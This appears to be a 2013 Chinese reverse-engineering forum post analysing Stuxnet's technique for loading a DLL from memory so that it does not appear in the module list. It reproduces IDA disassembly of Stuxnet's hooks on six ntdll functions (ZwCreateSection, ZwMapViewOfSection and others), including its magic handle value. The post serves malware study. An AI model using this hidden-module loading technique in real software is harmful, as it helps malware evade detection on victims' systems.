-
-
[原创]A了Stuxnet的加载DLL代码--从内存中加载某个DLL
-
发表于:
2013-6-15 21:20
15186
-
[原创]A了Stuxnet的加载DLL代码--从内存中加载某个DLL
Stuxnet出来很久很久了,之前看过分析文档,觉得它的加载DLL的方式比较有意思,一直没有时间来整,近段时间比较空闲,于是就有了这篇文章
首先,Stuxnet加载DLL的方式,不是传统的PE LOADER,而是将一片内容重新映射,这样做的效果就是,映射过后,这个DLL没有出现在模块列表中,但是可以GetProcAddress获得DLL的导出函数,Stuxnet调用15号导出函数就是这么干的。
Stuxnet的做法如下:
HOOK了6个ntdll的函数,分别为:
ZwCreateSection
ZwClose
ZwMapViewOfSection
ZwOpenFile
ZwQueryAttributesFile
ZwQuerySection
.text:10001B87 loc_10001B87: ; DATA XREF: sub_100017F5+108o
.text:10001B87 ; .text:off_10001AB2o
.text:10001B87 pop edx
.text:10001B88 test dl, dl
.text:10001B8A jz short loc_10001BB1 ; ZwMapViewOfSection
.text:10001B8C dec dl
.text:10001B8E jz loc_10001C16 ; ZwCreateSection
.text:10001B94 dec dl
.text:10001B96 jz loc_10001C57 ; ZwOpenFile
.text:10001B9C dec dl
.text:10001B9E jz loc_10001CA2 ; ZwClose
.text:10001BA4 dec dl
.text:10001BA6 jz loc_10001CEC ; ZwQueryAttributesFile
.text:10001BAC jmp loc_10001D3D ; ZwQuerySection
.text:10001CF5 push eax
.text:10001CF6 push edx
.text:10001CF7 push edi
.text:10001CF8 mov edi, [esp+14h]
.text:10001CFC call CompareName
.text:10001D01 pop edi
.text:10001D02 pop edx
.text:10001D03 test eax, eax
.text:10001D05 jz short loc_10001D1A
.text:10001D07 pop eax
.text:10001D08 test edx, edx
.text:10001D0A jz short loc_10001D17
.text:10001D0C mov edx, [esp+0Ch]
.text:10001D10 [COLOR="red"] mov dword ptr [edx+20h], 80h[/COLOR]
.text:10001D17
.text:10001D17 loc_10001D17: ; CODE XREF: .text:10001D0Aj
.text:10001D17 xor eax, eax
.text:10001D19 retn
.text:10001D1A ; ---------------------------------------------------------------------------
.text:10001D1A
.text:10001D1A loc_10001D1A: ; CODE XREF: .text:10001D05j
.text:10001D1A pop eax
.text:10001D1B
.text:10001D1B loc_10001D1B: ; CODE XREF: .text:10001CF3j
.text:10001D1B push edx
.text:10001D1C call sub_10001DF1
.text:10001D21 cmp dword ptr [edx+4], 0
.text:10001D25 jnz short loc_10001D30
.text:10001D27 pop edx
.text:10001D28 lea edx, [esp+8]
.text:10001D2C int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
.text:10001D2C ; DS:SI -> counted CR-terminated command string
.text:10001D2E jmp short locret_10001D3C
.text:10001D30 ; ---------------------------------------------------------------------------
.text:10001D30
.text:10001D30 loc_10001D30: ; CODE XREF: .text:10001D25j
.text:10001D30 pop edx
.text:10001D31 lea edx, [esp+8]
.text:10001D35 call large dword ptr fs:0C0h
.text:10001D3C
.text:10001D3C locret_10001D3C: ; CODE XREF: .text:10001D2Ej
.text:10001D3C retn
.text:10001C60 push eax
.text:10001C61 push edi
.text:10001C62 mov edi, [esp+18h]
.text:10001C66 call CompareName
.text:10001C6B mov edx, eax
.text:10001C6D pop edi
.text:10001C6E pop eax
.text:10001C6F test edx, edx
.text:10001C71 jz short loc_10001C80
.text:10001C73 mov eax, [esp+8]
.text:10001C77 mov dword ptr [eax], 0AE1982AEh
.text:10001C7D xor eax, eax
.text:10001C7F retn
.text:10001C80 ; ---------------------------------------------------------------------------
.text:10001C80
.text:10001C80 loc_10001C80: ; CODE XREF: .text:10001C5Ej
.text:10001C80 ; .text:10001C71j
.text:10001C80 push edx
.text:10001C81 call sub_10001DF1
.text:10001C86 cmp dword ptr [edx+4], 0
.text:10001C8A jnz short loc_10001C95
.text:10001C8C pop edx
.text:10001C8D lea edx, [esp+8]
.text:10001C91 int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
.text:10001C91 ; DS:SI -> counted CR-terminated command string
.text:10001C93 jmp short locret_10001CA1
.text:10001C95 ; ---------------------------------------------------------------------------
.text:10001C95
.text:10001C95 loc_10001C95: ; CODE XREF: .text:10001C8Aj
.text:10001C95 pop edx
.text:10001C96 lea edx, [esp+8]
.text:10001C9A call large dword ptr fs:0C0h
.text:10001CA1
.text:10001CA1 locret_10001CA1: ; CODE XREF: .text:10001C93j
.text:10001CA1 retn
.text:10001CA2 ; ---------------------------------------------------------------------------
.text:10001CA2
.text:10001CA2 loc_10001CA2: ; CODE XREF: .text:10001B9Ej
.text:10001CA2 [COLOR="Red"]cmp dword ptr [esp+8], 0AE1982AEh[/COLOR]
.text:10001CAA jnz short loc_10001CAF
.text:10001CAC xor eax, eax
.text:10001CAE retn
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课